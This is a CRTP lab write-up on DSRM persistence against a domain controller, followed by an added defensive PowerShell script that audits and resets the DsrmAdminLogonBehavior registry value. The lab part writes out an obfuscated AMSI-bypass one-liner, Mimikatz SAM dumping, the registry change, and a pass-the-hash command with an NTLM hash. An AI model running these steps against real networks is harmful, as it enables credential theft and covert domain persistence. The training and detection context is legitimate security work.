CRTP Lab 11

Task

Use Domain Admin privileges obtained earlier to abuse the DSRM credential for persistence.

We already have access to dcorp-dc. For a more durable foothold, we dump the DSRM (local Administrator) hash of the DC and modify the registry so that the DSRM account is allowed to log on to the DC over the network.

First, we use PSRemoting to access dcorp-dc.

# Run InviShell
C:\Users\student372>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

# Use PSRemoting to login to dcorp-dc
PS C:\Users\student372> $sess = New-PSSession dcorp-dc
PS C:\Users\student372> Enter-PSSession -Session $sess

# Disable AMSI on dcorp-dc
[dcorp-dc]: PS C:\Users\svcadmin\Documents> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

[dcorp-dc]: PS C:\Users\svcadmin\Documents> exit

Now, let's copy Invoke-Mimi to dcorp-dc and dump hashes.

# Copy Invoke-Mimi to DC
PS C:\Users\student372> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess
PS C:\Users\student372> Enter-PSSession -Session $sess
[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command '"token::elevate" "lsadump::sam"'

Now we can set the DSRM registry value so that DSRM admin can logon to DC from network.

[dcorp-dc]: PS C:\Users\svcadmin\Documents> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

From our local machine, we can Pass-the-Hash with the DSRM administrator's NTLM hash:

PS C:\AD\Tools> . C:\AD\Tools\Invoke-Mimi.ps1
PS C:\AD\Tools> Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'
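The defender-side counterpart to this technique, added here as an example and not part of the lab: the script below audits the DsrmAdminLogonBehavior value on every domain controller and flags any DC where it has been set to 1 or 2 (when the value is absent, the default 0 applies and the DSRM administrator can only log on while the DC is booted into Directory Services Restore Mode). It assumes the ActiveDirectory module is installed and that the account running it has WinRM access to the DCs; the function names are mine.

```powershell
# Added audit script (not from the lab). Assumes the ActiveDirectory module
# and WinRM access from an admin workstation to each domain controller.
function Get-DsrmLogonBehavior {
    [CmdletBinding()]
    param(
        # Defaults to every domain controller in the current domain.
        [string[]]$ComputerName = (Get-ADDomainController -Filter * |
            Select-Object -ExpandProperty HostName)
    )
    $key  = 'HKLM:\System\CurrentControlSet\Control\Lsa'
    $name = 'DsrmAdminLogonBehavior'

    Invoke-Command -ComputerName $ComputerName -ArgumentList $key, $name -ScriptBlock {
        param($key, $name)
        $prop = Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue
        # An absent value behaves like 0: the DSRM admin can only log on
        # when the DC is booted into Directory Services Restore Mode.
        $value = if ($null -eq $prop) { 0 } else { [int]$prop.$name }
        $risk = switch ($value) {
            0       { 'OK: DSRM logon only in DSRM mode' }
            1       { 'WARN: DSRM logon allowed while AD DS is stopped' }
            2       { 'ALERT: DSRM logon allowed at any time, including over the network' }
            default { "ALERT: unexpected value $value" }
        }
        [pscustomobject]@{
            DomainController = $env:COMPUTERNAME
            Value            = $value
            Risk             = $risk
        }
    } | Select-Object DomainController, Value, Risk
}

# Remediation: delete the value so the DC falls back to the default of 0.
function Remove-DsrmLogonBehavior {
    param([Parameter(Mandatory)][string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        Remove-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Lsa' `
            -Name 'DsrmAdminLogonBehavior' -ErrorAction Stop
    }
}

# Usage: list every DC whose DSRM logon behavior has been loosened.
Get-DsrmLogonBehavior | Where-Object Value -ne 0 | Format-Table -AutoSize
```

To catch the change as it happens rather than on the next audit run, put a SACL on the Lsa key and alert on Event ID 4657 (registry value modified) for DsrmAdminLogonBehavior from your DCs.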